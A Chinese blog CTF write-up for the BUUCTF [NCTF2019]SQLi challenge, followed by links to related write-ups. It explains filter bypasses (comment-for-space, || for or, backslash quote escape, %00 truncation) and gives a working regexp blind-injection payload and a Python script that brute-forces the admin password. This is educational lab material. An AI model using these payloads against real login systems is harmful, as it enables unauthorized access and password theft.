BUUCTF--[NCTF2019]SQLi

最新推荐文章于 2024-05-10 12:09:41 发布
最新推荐文章于 2024-05-10 12:09:41 发布
阅读量418 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/118733358
版权

首先我们在窗口中尝试一些闭合发现都被禁用了

 通过使用御剑可以扫描到robots.txt文件,进入查看可以找到hint.txt文件

 regexp正则注入

简单来说regexp用来匹配文本,不区分大小写,可以从头开始一位一位进行爆破

根据提示我们需要对passwd进行爆破,用户名可以任意

If $_POST['passwd'] === admin's password,

Then you will get the flag;

空格由/**/or可以用||代替

综上,我们可以大致构造payload为

username=\
passwd=||/**/passwd/**/regexp/**/"^a"

由于末尾的单引号并未闭合,所以要用到%00作为一个截断的作用来代替# 和-- -这类注释符

passwd=||/**/passwd/**/regexp/**/"^a";%00&username=\

接下来使用python 进行密码爆破即可

import requests
from urllib import parse
import string
import time

url='http://60a15aaf-a831-477a-96b4-c25ec5aea4ef.node3.buuoj.cn/index.php'

string= string.ascii_lowercase + string.digits + '_'

flag=''

for i in range(100):
    for j in string:

        data={
            "passwd":"||/**/passwd/**/regexp/**/\"^{}\";{}".format((flag+j),parse.unquote('%00')),
            #'passwd':'||/*1*/passwd/*1*/regexp/*1*/"^{}";{}'.format(i,'%00'),
            'username':"\\"
        }
        #print(data)
        res = requests.post(url=url,data=data).text
        #print(res)
        if 'welcome' in res:
            flag+=j
            print(flag)
            #print(res)
            break
        time.sleep(0.1)
    time.sleep(0.1)

%00注释

该符号不是MySQL的注释符,但PHP具有%00截断的漏洞,有些函数会把%00当做结束符,也就起到了注释掉后面代码的作用。 (比如文件上传中的00截断漏洞)

在Python脚本中的使用:Python访问浏览器,会进行一次URL编码, 因此参数中的URL编码在服务端并不会解码,#等可打印字符直接在参数中输入字符即可,但不可打印字符如%00就需要进行格式处理。

问题变成了:如何在Python输入不可打印字符?

可以使用parse.unquote(’%00’),或者chr(0),二者都需要使用.format()进行格式化输出。完整格式.format(parse.unquote('%00'))或.format(chr(0))。 

参考:

1

2

Uzero.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFer成长之路之CTF中的SQL注入
自强不息
02-20 1502
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 4006
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
BugKu CTF(Web):sqli-0x1 & baby lfi & baby lfi 2
Flag少侠的博客
05-10 1508
BugKu是一个由乌云知识库(wooyun.org)推出的在线漏洞靶场。乌云知识库是一个致力于收集、整理和分享互联网安全漏洞信息的社区平台。BugKu旨在提供一个实践和学习网络安全的平台,供安全爱好者和渗透测试人员进行挑战和练习。它包含了各种不同类型的漏洞场景,如Web漏洞、系统漏洞、密码学等,参与者需要通过解决这些漏洞来获取Flag。
[NCTF2019]SQLi
weixin_68906365的博客
02-19 267
regexp注入
[NCTF2019]SQLi ---不会编程的崽
不会编程的崽的博客
03-24 759
过滤有点多哦,而且我还没放完。单引号被过滤了,一刀砍在大动脉。但是路堵了,不代表窗户也封了。思路的确是这个思路,不过常规盲注与常规注入关键字被过滤差不多,看了大佬wp,说重点在regexp上。因为是正则匹配,所以在脚本中,一定要过滤掉通配符("*","+","?而且这个passwd列名,是猜的。很直接哦,给出了sql查询语句。简单扫描一下,robots.txt还能访问。过滤了一些东西,而且只要密码对了就能拿到flag。含义:匹配当前表下,passwd列里的内容是否为YO或者yo。自己写的脚本有点烂,见谅。
超微X11SPH-NCTPF主板用户手册
04-01
超微X11SPH-NCTPF主板用户手册
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
最新发布
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
全国大学生电子设计大赛之历年.7z
09-19
全国大学生电子设计大赛是一项旨在推动我国高校电子信息类专业教学改革,提高学生动手能力和工程实践能力的重要赛事。这个.7z压缩包文件包含了自大赛创办以来,从第一届到第十四届的所有竞赛题目,对于参赛学生、...
BUUCTF:[NCTF2019]SQLi --sql正则注入 ---- regexp注入 --- sql 闭合的新的骚操作 --PHP版本的%00截断
Zero_Adam的博客
03-15 971
目录:一、自己做,二、学到的:三、学习WP:1.盲注, 这个讲正则注入原理比较细致,有mysql的本地实验 这个有一道例题 一、自己做, fuzzing了,但是没有思路, 给我这么一句话:try to make the sqlquery have its own results. 后来发现没用, 二、学到的: mysql正则注入 regex 一个新的sql闭合方式,妈呀,骚的很,至少对于我这个菜鸡才说是开了眼界了,,,牛你牛后面看看 sql注入时,当注释符和单引号都被过滤了的时候,我们不能够闭合语句了,
刷题记录-[NCTF2019]SQLi
weixin_43610673的博客
05-09 2129
测试一下 应该是or被拦截了 简单fuzz一下 可以看到regexp是可以用的 题目也直接给了被过滤的关键词 找到admin的密码即可得flag 由于单引号被禁用,使用 \ 转义and前面的那个单引号,使得 '\' and passwd=' 形成闭合 构造passwd处为 ||/**/passwd/**/regexp/**/"^a";%00 用regexp查询passwd ^匹配字符串开头 %00截断后面的内容 但是不能在输入框直接提交,会被url encode 变为%2500被黑名单拦截.
NCTF2019-官方writeup
郁离歌丶的博客
05-08 2203
NCTF2019-官方writeup
BUUCTF Crypto [NCTF2019]childRSA wp
hsqGOD's blog
03-16 2947
这一道RSA打开加密算法乍一看感觉没有问题,N特别大,除了p和q的生成算法啥都没给,于是我们去查了一下 Crypto.Util.number 中的sieve_base,发现这是前10000个素数的生成列表,我们再去查一下第10000个素数的值为104729 不过就算我们知道了这个值的大小似乎还是得不到结果,从这个p,q的生成算法中,我们可以知道其是由小于104729的素数随机组合生成的,在这里我...
BUUCTF-sqli-labs1
Nothing-one的博客
07-16 1564
根据题目内容他让我们(请输入id作为带数值的参数 )这个为数字型注入。 这里面我用了sqlmap工具来进行解题。 在里面输入 python sqlmap.py -u +(网站名)(记住在网站名后面要加入?id=1) --dbs #获取数据库 这样我们就可以获得数据库中的名称了。 下面我们就要看数据库中的表明了。 python sqlmap.py -u +(网站名) -D 数据库名 --tables #列出表名 我们知道了表名,下面我们就要爆出字段名。 python sqlmap.py -u +(网站名)
[NCTF2019]SQLi 1&regexp注入
plant1234的博客
10-03 1314
发现为ture时返回Location: welcome.php。随便输入一个用户,用admin的密码登陆得到flag。并且当密码和admin密码相同时就能得到flag。可以利用bool盲注进行注入,爆破passwd。发现没有过滤 " 和 \。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值